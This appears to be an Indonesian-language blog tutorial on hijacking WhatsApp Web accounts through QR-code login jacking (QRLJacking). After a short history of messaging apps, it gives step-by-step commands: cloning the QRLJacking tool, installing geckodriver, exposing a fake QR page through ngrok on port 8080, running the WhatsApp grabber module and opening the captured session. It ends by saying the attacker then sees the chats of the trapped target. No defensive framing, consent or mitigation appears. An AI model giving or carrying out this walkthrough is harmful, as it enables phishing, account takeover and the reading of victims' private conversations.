Jauh sebelum masa di mana jaringan ponsel secepat sekarang, saat masa di mana kita masih menggunakan Ponsel dengan tombol, kita bertukar pesan teks dan suara menggunakan SMS dan Voice Call melalui jaringan GSM. Namun siapa sangka, internet berevolusi menyediakan layanan pertukaran informasi yang relatif lebih murah dan hemat biaya. Terlebih lagi bisa mengirim gambar, video dan lain sebagainya. SMS dan Voice Call pun mulai jarang digunakan dan orang beralih ke aplikasi pesan instan yang juga bisa disebut dengan aplikasi Chat.
Aplikasi Chat banyak digunakan oleh masyarakat pada tahun 2021 ini, contohnya seperti Telegram, Whatsapp, Messenger dari Facebook, Signal dan lain sebagainya. Whatsapp adalah aplikasi paling populer dari semua aplikasi yang saya sebutkan tadi, tidak hanya itu Whatsapp juga mempunyai fitur Whatsapp Web untuk pengguna agar bisa digunakan pada komputer. Whatsapp web menggunakan fitur Kode QR untuk mengauthentikasi pengguna ke sebuah komputer. Namun siapa sangka, kode QR Whatsapp ini bisa digunakan oleh Hacker untuk menyadap akses Whatsapp anda.
Ternyata, permintaan kode QR dari komputer yang digenerate oleh situs Whatsapp Web itu bisa dipalsukan dengan membuat request kode QR yang sama dari komputer lain. Pemalsuan kode QR ini adalah salah satu teknik social engineering dan juga bisa disebut dengan serangan phising. Kali ini, saya akan menggunakan tool QRLJacking yang bisa kita dapatkan di github. Seperti biasa, untuk host kode QR palsu ini kita membutuhkan port forwarder yang kali ini saya akan menggunakan ngrok.
Baik langsung saja seperti biasa, sebuah PC/Laptop dengan OS Linux.
Selanjutnya, aplikasi QRLJacker yang bisa anda dapatkan di github.
git clone https://github.com/OWASP/QRLJacking.git
Pada komputer saya, karena saya menggunakan Linux 64 bit maka saya mengunduh geckodriver versi Linux 64 bit. Selanjutnya adalah mengekstrak geckodriver tadi.
tar xzvf geckodriver-v0.29.0-linux64.tar.gz
chmod +x geckodriver
Selanjutnya pindahkan geckodriver ke direktori binary Linux.
sudo mv -f geckodriver /usr/local/share/geckodriver
Berikutnya adalah membuat link geckodriver.
sudo ln -s /usr/local/share/geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Baik konfigurasi sudah siap, selanjutnya adalah menjalankan port forward ke internet. Seperti tutorial kebanyakan, di sini kita akan menggunakan ngrok. Kita akan mengaktifkan port forward ngrok ke port 8080.
ngrok http 8080
use grabber/whatsapp
set port 8080
set host 0.0.0.0
run
sessions
sessions -i 0
Lalu kita akan di hadapkan pada isi percakapan Whatsap Web milik target yang kita jebak tadi.
0 Komentar